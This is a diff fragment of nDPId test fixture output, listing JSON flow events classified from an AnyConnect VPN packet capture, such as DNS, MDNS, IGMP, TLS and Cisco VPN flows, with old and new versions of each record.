+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1569687249612,"flow_last_seen":1569687268086,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":384,"flow_tot_l4_payload_len":1372,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56917,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"}}
+00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687287737,"flow_last_seen":1569687287737,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00637{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687246982,"flow_last_seen":1569687260293,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00635{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687246982,"flow_last_seen":1569687260293,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.2","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00635{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687241657,"flow_last_seen":1569687241657,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00631{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687241452,"flow_last_seen":1569687241452,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1569687277139,"flow_last_seen":1569687283186,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":912,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687260469,"flow_last_seen":1569687260521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":17,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"35.201.124.9","src_port":56910,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}}
 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687260469,"flow_last_seen":1569687260521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":17,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"35.201.124.9","src_port":56910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687260751,"flow_last_seen":1569687260767,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64972,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687271764,"flow_last_seen":1569687271764,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":51382,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687251177,"flow_last_seen":1569687251230,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":74,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":54851,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687247192,"flow_last_seen":1569687259297,"flow_idle_time":180000,"flow_min_l4_payload_len":232,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":232,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.213","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"}}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687246891,"flow_last_seen":1569687246924,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":63107,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687261035,"flow_last_seen":1569687261054,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":52879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687245251,"flow_last_seen":1569687245288,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":52879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00620{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267677,"flow_last_seen":1569687268288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":24,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.10.115.210","src_port":56879,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687271764,"flow_last_seen":1569687271764,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":51382,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687251177,"flow_last_seen":1569687251230,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":74,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":54851,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687247192,"flow_last_seen":1569687259297,"flow_idle_time":180000,"flow_min_l4_payload_len":232,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":232,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.213","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687246891,"flow_last_seen":1569687246924,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":63107,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687261035,"flow_last_seen":1569687261054,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":52879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687245251,"flow_last_seen":1569687245288,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":52879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267677,"flow_last_seen":1569687268288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":24,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.10.115.210","src_port":56879,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267677,"flow_last_seen":1569687268288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":24,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.10.115.210","src_port":56879,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2441,"flow_first_seen":1569687268746,"flow_last_seen":1569687289262,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1469,"flow_tot_l4_payload_len":789975,"flow_avg_l4_payload_len":323,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":54107,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687261486,"flow_last_seen":1569687261506,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":77,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57017,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1569687241656,"flow_last_seen":1569687287122,"flow_idle_time":120000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":1920,"flow_avg_l4_payload_len":120,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip6","src_ip":"fe80::2e7e:81ff:feb0:4aa1","dst_ip":"ff02::1","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1569687286917,"flow_last_seen":1569687286919,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":121,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"}}
+00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2441,"flow_first_seen":1569687268746,"flow_last_seen":1569687289262,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1469,"flow_tot_l4_payload_len":789975,"flow_avg_l4_payload_len":323,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":54107,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687261486,"flow_last_seen":1569687261506,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":77,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57017,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1569687241656,"flow_last_seen":1569687287122,"flow_idle_time":120000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":1920,"flow_avg_l4_payload_len":120,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip6","src_ip":"fe80::2e7e:81ff:feb0:4aa1","dst_ip":"ff02::1","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1569687286917,"flow_last_seen":1569687286919,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":121,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1569687246981,"flow_last_seen":1569687272376,"flow_idle_time":180000,"flow_min_l4_payload_len":90,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":1070,"flow_avg_l4_payload_len":118,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687261485,"flow_last_seen":1569687261501,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":77,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59222,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267799,"flow_last_seen":1569687267819,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51060,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"}}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267477,"flow_last_seen":1569687267493,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57253,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687261034,"flow_last_seen":1569687261050,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57261,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00619{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687246924,"flow_last_seen":1569687246924,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569687241422,"flow_last_seen":1569687286460,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":2200,"flow_avg_l4_payload_len":73,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56320,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687245295,"flow_last_seen":1569687245320,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":80,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687269716,"flow_last_seen":1569687269716,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":49816,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
